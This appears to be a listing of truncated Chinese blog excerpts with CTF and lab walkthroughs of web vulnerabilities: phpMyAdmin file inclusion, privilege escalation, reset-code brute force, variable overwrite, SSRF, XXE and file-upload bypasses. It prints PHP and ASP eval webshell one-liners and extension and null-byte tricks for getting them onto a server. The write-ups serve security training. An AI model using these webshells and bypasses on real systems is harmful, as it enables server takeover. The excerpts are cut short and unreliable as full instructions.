网上下载phpMyAdmin4.8.1源码(我上传到附件)然后进行源码审计全局搜索include然后登入phpmyadmin,写入一句话木马<?php eval($_GET['wan']); ?>然后就是爆出数据库的路径输入select @@datadir@@datadirC:\phpStudy\PHPTutorial\MySQL\data\然后构造payload只要满

越权访问漏洞，又可以分为平行越权访问漏洞与垂直越权访问漏洞两类。平行越权访问漏洞，指的是权限平级的两个用户之间的越权访问。比如，一个正常的用户A通常只能够对自己的一些信息进行增删改查，但是由于程序员的一时疏忽未对信息进行增删改查的时候进行一个判断，判断所需要操作的信息是否属于对应的用户，因此，导致用户A可以操作其他人的信息。垂直越权访问漏洞，指的是权限不等的两个用户之间的越权访问。一般都是，低权限

这题主要就是绕过验证码来到靶场根据靶场提示访问：http://117.41.229.122:8010/hahq_Admin/?umail=408362692@qq.com&type=ok发现是一个重置密码的页面我们把这题的源码下载下来进行审计全局搜索里搜：密码找回通过审计发现,$fsjs=rand(10,10000)随机生成认证码，只有认证码一样就可以重置密码我么通过抓包进行爆破爆破成功，

变量覆盖指的是用我们自定义的参数值替换程序原有的变量值，一般变量覆盖漏洞需要结合程序的其它功能来实现完整的攻击。 经常导致变量覆盖漏洞场景有：$$，extract()函数，parse_str()函数，import_request_variables()使用不当，开启了全局变量注册等。来到靶场发现用的是duomicms x2.0我们百度下载该源码然后进行审计，我们添加规则我们点击自动审计发

支付漏洞嘛简单来说也算是逻辑漏洞吧就是抓个包，修改一下金额就可以实现0元乐享无限商品然后牢底坐穿废话不多说上把靶场先注册一个会员然后进入商品中心，输入负数这是是逻辑错误，本来不应该会出现负数，然后购买成功拿到flag

（Server-Side Request Forgery，服务器端请求伪造）：通俗的来说就是我们可以伪造服务器端发起的请求，从而获取客户端所不能得到的数据。SSRF漏洞形成的原因主要是服务器端所提供的接口中包含了所要请求的内容的URL参数，并且未对客户端所传输过来的URL参数进行过滤。这个漏洞造成的危害有：(1)、可以对外网、服务器所在内网、本地进行端口扫描，获取一些服务的banner信息;(2)

XXE实体注入首先了解一下XXE原理:有了XML实体，关键字system会令XML解析器从URL中读取内容，并允许它在XML文档中被替换。因此攻击者可以通过实体将ta自定义的值发送给应用程序，然后让应用程序去呈现。简单点说我可以构造语句然后去读取你服务器上的一些敏感文件进入靶场：审计一会代码，发现这里没有过滤处理我们抓包处理然后加上我们自己构造的语句：<?xml version="

pass 20IIS6.0解析漏洞1.在文件夹为asp.asa内的所有未见被当成解析文件解析2.分号后面的不被解析：例如 1.asp;.jpg3.asp cer cdx 也会被解析我们先建一个asp的一句话木马<%eval request(“wan”)%>，后缀为6.jpg然后后缀改为6.asa然后连菜刀pass 21这题我们可以更改文件名绕过6.asp;.jpg（;后面的不会被解析）

pass 11在url中%00表示ascll码中的0 ，而ascii中0作为特殊字符保留，表示字符串结束，所以当url中出现%00时就会认为读取已结束比如https://mp.csdn.net/upfiles/?filename=test.jpg                     

pass 1看到提示前端验证，说明可以抓包绕过，先写一句php木马，然后改成jpg形式抓包，然后改回php形式成功上传pass 2Content-Type方式绕过这道题也可以抓包绕过pass 3这是黑名单机制，我们上传一个木马文件，后缀为1.phtml(在页面被发送给请求的用户之前，网页服务器调用PHP解释程序来解释和执行PHP脚本。含有PHP脚本的网页通常都以“.php”、“.phps”或“.p